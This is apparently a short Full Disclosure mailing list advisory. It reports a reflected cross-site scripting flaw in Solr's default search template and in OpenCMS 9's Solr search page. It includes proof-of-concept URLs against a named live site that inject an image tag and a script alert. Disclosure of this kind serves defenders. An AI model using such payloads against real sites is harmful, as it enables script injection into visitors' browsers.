Hello, the default search template for solr is prone for XSS, because nobody validated the input.
PoC: http://find.searchhub.org/?q=%3Cimg+src%3D%27http%3A%2F%2Fc.s-microsoft.com%2Fnl-nl%2FCMSImages%2Fmslogo.png%3Fversion%3D856673f8-e6be-0476-6669-d5bf2300391d%27%3E http://find.searchhub.org/?q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E This is also valid for any opencms website that uses the solr search, e.g. the default opencms search template based on solr in opencms version 9. E.g. point your browser to http://localhost:8080/opencms/opencms/demo/search-page/ and search for <img src='http://c.s-microsoft.com/nl-nl/CMSImages/mslogo.png?version=856673f8-e6be-0476-6669-d5bf2300391d'> That might not be a solr issue, but an implementation one. Regards. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
